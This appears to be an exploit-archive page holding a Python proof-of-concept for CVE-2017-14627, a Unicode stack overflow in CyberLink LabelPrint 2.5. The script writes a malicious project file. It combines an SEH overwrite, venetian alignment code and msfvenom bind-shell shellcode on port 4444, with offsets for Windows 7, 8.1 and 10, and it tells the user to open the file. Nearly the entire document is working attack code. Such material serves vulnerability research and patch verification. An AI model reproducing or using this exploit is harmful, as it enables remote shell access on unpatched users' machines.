CyberLink LabelPrint Buffer Overflow

`#!/usr/bin/python  
# Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow  
# Date: September 23, 2017  
# Exploit Author: f3ci  
# Vendor Homepage: https://www.cyberlink.com/  
# Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe  
# Version: 2.5  
# Tested on: Windows 7x86, Windows8.1x64, Windows 10  
# CVE : CVE-2017-14627  
#   
# Note: Cyberlink LabelPrint is bundled with Power2Go application and also included in most HP, Lenovo, and Asus laptops.  
# this proof of concept is based on the LabelPrint 2.5 that comes with Power2Go installation.  
  
def exp():  
header = ("\x3c\x50\x52\x4f\x4a\x45\x43\x54\x20\x76\x65\x72\x73\x69\x6f\x6e"  
"\x3d\x22\x31\x2e\x30\x2e\x30\x30\x22\x3e\x0a\x09\x3c\x49\x4e\x46"  
"\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x20\x74\x69\x74\x6c\x65\x3d\x22"  
"\x22\x20\x61\x75\x74\x68\x6f\x72\x3d\x22\x22\x20\x64\x61\x74\x65"  
"\x3d\x22\x37\x2f\x32\x34\x2f\x32\x30\x31\x37\x22\x20\x53\x79\x73"  
"\x74\x65\x6d\x54\x69\x6d\x65\x3d\x22\x32\x34\x2f\x30\x37\x2f\x32"  
"\x30\x31\x37\x22\x3e")  
filename2 = "labelprint_poc_universal.lpp"  
f = open(filename2,'w')  
junk = "A" * 790  
nseh = "\x61\x42"  
seh = "\x2c\x44"  
nop = "\x42"  
  
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python  
buf = ""  
buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"  
buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"  
buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"  
buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"  
buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"  
buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"  
buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"  
buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"  
buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"  
buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"  
buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"  
buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"  
buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"  
buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"  
buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"  
  
  
#preparing address for decoding  
ven = nop #nop/inc edx  
ven += "\x54" #push esp  
ven += nop #nop/inc edx  
ven += "\x58" #pop eax  
ven += nop #nop/inc edx  
ven += "\x05\x1B\x01" #add eax 01001B00 universal  
ven += nop #nop/inc edx  
ven += "\x2d\x01\x01" #sub eax 01001000  
ven += nop #nop/inc edx  
ven += "\x50" #push eax  
ven += nop #nop/inc edx  
ven += "\x5c" #pop esp  
  
#we need to encode the RET address, since C3 is bad char.  
#preparing ret opcode  
ven += nop #nop/inc edx  
ven += "\x25\x7e\x7e" #and eax,7e007e00  
ven += nop #nop/inc edx  
ven += "\x25\x01\x01" #and eax,01000100  
ven += nop #nop/inc edx  
ven += "\x35\x7f\x7f" #xor eax,7f007f00  
ven += nop #nop/inc edx  
ven += "\x05\x44\x44" #add eax,44004400  
ven += nop #nop/inc edx  
ven += "\x57" #push edi  
ven += nop #nop/inc edx  
ven += "\x50" #push eax  
ven += junk2 #depending OS  
  
#custom venetian   
ven += "\x58" #pop eax  
ven += nop #nop/inc edx  
ven += "\x58" #pop eax  
ven += nop #nop/inc edx  
ven += align #depending OS  
ven += nop #nop/inc edx  
ven += "\x2d\x01\x01" #add eax, 01000100 #align eax to our buffer  
ven += nop #nop/inc edx  
ven += "\x50" #push eax  
ven += nop #nop/inc edx  
  
#call esp 0x7c32537b MFC71U.dll  
ven += "\x5C" #pop esp  
ven += nop #nop/inc edx  
ven += "\x58" #pop eax  
ven += nop #nop/inc edx  
ven += "\x05\x53\x7c" #add eax 7c005300 part of call esp  
ven += nop #nop/inc edx  
ven += "\x50" #push eax  
ven += junk1 #depending OS  
ven += "\x7b\x32" #part of call esp  
  
#preparing for shellcode  
ven += nop * 114 #junk  
ven += "\x57" #push edi  
ven += nop #nop/inc edx  
ven += "\x58" #pop eax  
ven += nop #nop/inc edx  
ven += align2 #depending OS  
ven += nop #nop/inc edx  
ven += "\x2d\x01\x01" #sub eax,01000100  
ven += nop #nop/inc edx  
ven += buf #shellcode  
  
sisa = nop * (15000-len(junk+nseh+seh+ven))  
payload = junk+nseh+seh+ven+sisa  
bug="\x09\x09\x3c\x54\x52\x41\x43\x4b\x20\x6e\x61\x6d\x65\x3d"+'"'+payload+'"'+"/>\n"  
bug+=("\x09\x3c\x2f\x49\x4e\x46\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x3e\x0a"  
"\x3c\x2f\x50\x52\x4f\x4a\x45\x43\x54\x3e")  
f.write(header+ "\n" + bug)  
  
print "[+] File", filename2, "successfully created!"  
print "[*] Now open project file", filename2, "with CyberLink LabelPrint."  
print "[*] Good luck ;)"  
f.close()  
  
print "[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->"  
print "[*] by f3ci & modpr0be <research[at]spentera.id>"  
print "[*] <------------------------------------------------->\n"  
print "\t1.Windows 7 x86 bindshell on port 4444"  
print "\t2.Windows 8.1 x64 bindshell on port 4444"  
print "\t3.Windows 10 x64 bindshell on port 4444\n"  
input = input("Choose Target OS : ")  
try:  
if input == 1:  
align = "\x05\x09\x01" #add eax,01000400  
align2 = "\x05\x0A\x01" #add eax, 01000900  
junk1 = '\x42' * 68 #junk for win7x86  
junk2 = '\x42' * 893 #junk for win7x86  
exp()  
elif input == 2:  
align = "\x05\x09\x01" #add eax,01000400  
align2 = "\x05\x0A\x01" #add eax, 01000900  
junk1 = '\x42' * 116 #junk for win8.1x64  
junk2 = '\x42' * 845 #junk for win8.1x64  
exp()  
elif input == 3:  
align = "\x05\x05\x01" #add eax,01000400  
align2 = "\x05\x06\x01" #add eax, 01000900  
junk1 = '\x42' * 136 #junk for win10x64  
junk2 = '\x42' * 313 #junk for win10x64  
exp()   
else:  
print "Choose the right one :)"  
except:  
print ""  
  
`